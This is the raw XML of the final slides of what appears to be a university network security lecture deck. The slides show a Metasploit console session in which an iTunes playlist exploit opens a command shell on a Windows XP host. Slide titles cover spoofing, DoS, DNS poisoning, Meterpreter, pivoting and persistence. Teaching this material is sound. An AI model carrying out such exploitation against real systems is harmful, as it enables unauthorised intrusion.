            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>msf&gt; exploit(apple_itunes_playlist) &gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[*] Sending stage (474 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[*] Command shell session 1 opened (10.10.21.10:65535 -&gt; 192.168.113.10:1075)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>msf&gt; exploit(apple_itunes_playlist) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>sessions -i 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[*] Starting interaction with 1...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Windows XP [Version 5.1.2600]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(C) Copyright 1985-2001 Microsoft Corp.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>C:\WINDOWS\System32\&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99332" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45718" rIns="91435" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{29779917-04EC-4DD6-9869-C63C7602A49D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1100" smtClean="0"/>
              <a:pPr/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="1066800"/>
            <a:ext cx="11703050" cy="752475"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91435" tIns="45718" rIns="91435" bIns="45718" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – GUI for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100355" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45718" rIns="91435" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E00E0B3-8041-42F5-A5AA-7AB941DCBC96}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1100" smtClean="0"/>
              <a:pPr/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100356" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1625600" y="1981200"/>
            <a:ext cx="9401175" cy="7334250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100357" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10488613" y="461963"/>
            <a:ext cx="2236787" cy="2236787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="4114800"/>
            <a:ext cx="11703050" cy="3352800"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Next Lecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Covering your tracks….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105475" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{667D2007-77F1-4AB2-951F-D57A8121A097}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition/>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Blank">
  <a:themeElements>
    <a:clrScheme name="">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="00000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00"/>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rgbClr val="000000"/>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ullets">
  <a:themeElements>
    <a:clrScheme name="">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="00000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00"/>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rgbClr val="000000"/>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ullets">
  <a:themeElements>
    <a:clrScheme name="">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="00000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00"/>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rgbClr val="000000"/>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7311</TotalTime>
  <Pages>0</Pages>
  <Words>5690</Words>
  <Characters>0</Characters>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Lines>0</Lines>
  <Paragraphs>1005</Paragraphs>
  <Slides>97</Slides>
  <Notes>16</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2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>97</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="113" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>ZapfDingbats</vt:lpstr>
      <vt:lpstr>Blank</vt:lpstr>
      <vt:lpstr>Bullets</vt:lpstr>
      <vt:lpstr>1_Bullets</vt:lpstr>
      <vt:lpstr>Clip</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>Network Security</vt:lpstr>
      <vt:lpstr>Learning Objectives</vt:lpstr>
      <vt:lpstr>NETWORK ATTACK TECHNIQUES</vt:lpstr>
      <vt:lpstr>Network Attack Methodology</vt:lpstr>
      <vt:lpstr>Sources of Insecurity</vt:lpstr>
      <vt:lpstr>Configuration Security</vt:lpstr>
      <vt:lpstr>General Attack Techniques</vt:lpstr>
      <vt:lpstr>IP address spoofing (1)</vt:lpstr>
      <vt:lpstr>IP address spoofing (2)</vt:lpstr>
      <vt:lpstr>IP spoofing with TCP?</vt:lpstr>
      <vt:lpstr>Defense: Ingress filtering: access ISP</vt:lpstr>
      <vt:lpstr>Ingress Filtering: Upstream ISP (1)</vt:lpstr>
      <vt:lpstr>Ingress Filtering: Upstream ISP (2)</vt:lpstr>
      <vt:lpstr>Ingress Filtering: Upstream ISP (3)</vt:lpstr>
      <vt:lpstr>Ingress Filtering: Upstream ISP (4)</vt:lpstr>
      <vt:lpstr>Ingress filtering: summary</vt:lpstr>
      <vt:lpstr>Session hijacking</vt:lpstr>
      <vt:lpstr>Session hijacking: The details</vt:lpstr>
      <vt:lpstr>Session hijacking: limitation</vt:lpstr>
      <vt:lpstr>Denial-of-Service</vt:lpstr>
      <vt:lpstr>Denial-of-Service</vt:lpstr>
      <vt:lpstr>Interlude: IP datagram format</vt:lpstr>
      <vt:lpstr>IP Fragmentation and Reassembly</vt:lpstr>
      <vt:lpstr>DoS: examples of vulnerability attacks</vt:lpstr>
      <vt:lpstr>Connection flooding: Overwhelming connection queue w/ SYN flood</vt:lpstr>
      <vt:lpstr>DoS: Overwhelming connection queue with SYN flood </vt:lpstr>
      <vt:lpstr>SYN flood defense: SYN cookies (1)</vt:lpstr>
      <vt:lpstr>SYN flood defense: SYN cookies (2)</vt:lpstr>
      <vt:lpstr>Overwhelming link bandwidth with packets</vt:lpstr>
      <vt:lpstr>Distributed DoS: DDos</vt:lpstr>
      <vt:lpstr>DDoS: Reflection attack</vt:lpstr>
      <vt:lpstr>DDoS: Reflection attack</vt:lpstr>
      <vt:lpstr>DDoS Defenses</vt:lpstr>
      <vt:lpstr>Network Time Protocol (NTP)</vt:lpstr>
      <vt:lpstr>Review: DNS DDoS Reflection attack</vt:lpstr>
      <vt:lpstr>NTP ‘Monlist’ Example</vt:lpstr>
      <vt:lpstr>NTP Abuse</vt:lpstr>
      <vt:lpstr>DNS attacks</vt:lpstr>
      <vt:lpstr>Interlude: How DNS Works</vt:lpstr>
      <vt:lpstr>DDoS DNS Attack</vt:lpstr>
      <vt:lpstr>DNS attack: redirecting</vt:lpstr>
      <vt:lpstr>Poisoning DNS Cache (1)</vt:lpstr>
      <vt:lpstr>Poisoning local DNS server (2)</vt:lpstr>
      <vt:lpstr>Poisoning local DNS server (3)</vt:lpstr>
      <vt:lpstr>DNS Poisoning (4)</vt:lpstr>
      <vt:lpstr>DNS attacks: Summary</vt:lpstr>
      <vt:lpstr>Attack Classification </vt:lpstr>
      <vt:lpstr>Client Side Attacks</vt:lpstr>
      <vt:lpstr>Client Side Attacks (Examples – Fake URLS)</vt:lpstr>
      <vt:lpstr>Client Side Attacks (Examples – HTML)</vt:lpstr>
      <vt:lpstr>Client Side Attacks (Examples)</vt:lpstr>
      <vt:lpstr>Example Client Side Exploit</vt:lpstr>
      <vt:lpstr>TOOLS AND ATTACK IMPLEMENTATION</vt:lpstr>
      <vt:lpstr>Vulnerability Scanners</vt:lpstr>
      <vt:lpstr>Nessus</vt:lpstr>
      <vt:lpstr>Nessus Architecture</vt:lpstr>
      <vt:lpstr>Nessus Plugin Selection</vt:lpstr>
      <vt:lpstr>Nessus Scan Results</vt:lpstr>
      <vt:lpstr>Web Vulnerability Scanners</vt:lpstr>
      <vt:lpstr>Nikto</vt:lpstr>
      <vt:lpstr>Exploits Bought and Sold</vt:lpstr>
      <vt:lpstr>Exploitation Tools</vt:lpstr>
      <vt:lpstr>Immunity Canvas</vt:lpstr>
      <vt:lpstr>Canvas Interface</vt:lpstr>
      <vt:lpstr>Canvas – Launch Exploit</vt:lpstr>
      <vt:lpstr>The Metasploit Framework</vt:lpstr>
      <vt:lpstr>Terms </vt:lpstr>
      <vt:lpstr>Why? </vt:lpstr>
      <vt:lpstr>Architecture Overview</vt:lpstr>
      <vt:lpstr>More About Payloads </vt:lpstr>
      <vt:lpstr>More About Payloads (cont) </vt:lpstr>
      <vt:lpstr>Metasploit Interfaces</vt:lpstr>
      <vt:lpstr>MsfConsole</vt:lpstr>
      <vt:lpstr>MsfConsole Basics</vt:lpstr>
      <vt:lpstr>Directory Structure</vt:lpstr>
      <vt:lpstr>Modules</vt:lpstr>
      <vt:lpstr>Exploitation Basics</vt:lpstr>
      <vt:lpstr>Exploitation Basics (cont)</vt:lpstr>
      <vt:lpstr>Exploitation Basics (cont)</vt:lpstr>
      <vt:lpstr>Exploitation Basics (cont)</vt:lpstr>
      <vt:lpstr>Exploitation Basics (cont)</vt:lpstr>
      <vt:lpstr>Exploitation Basics (cont)</vt:lpstr>
      <vt:lpstr>Exploitation Basics (cont)</vt:lpstr>
      <vt:lpstr>Meterpreter</vt:lpstr>
      <vt:lpstr>How it Works</vt:lpstr>
      <vt:lpstr>Now What?  - Post Exploitation</vt:lpstr>
      <vt:lpstr>Pivoting</vt:lpstr>
      <vt:lpstr>Pivoting using Meterpreter </vt:lpstr>
      <vt:lpstr>Persistence</vt:lpstr>
      <vt:lpstr>Persistence Script</vt:lpstr>
      <vt:lpstr>Persistence Service</vt:lpstr>
      <vt:lpstr>“3rd Party” Rootkits</vt:lpstr>
      <vt:lpstr>Client Side Exploits </vt:lpstr>
      <vt:lpstr>Example Client Side Exploit</vt:lpstr>
      <vt:lpstr>Example Client Side Exploit</vt:lpstr>
      <vt:lpstr>Armitage – GUI for Metasploit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Security</dc:title>
  <dc:creator>Mak, Phillip CIV USA</dc:creator>
  <cp:lastModifiedBy>Phillip Mak</cp:lastModifiedBy>
  <cp:revision>104</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-11-10T19:03:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-16T19:00:23Z</dcterms:modified>
</cp:coreProperties>
</file>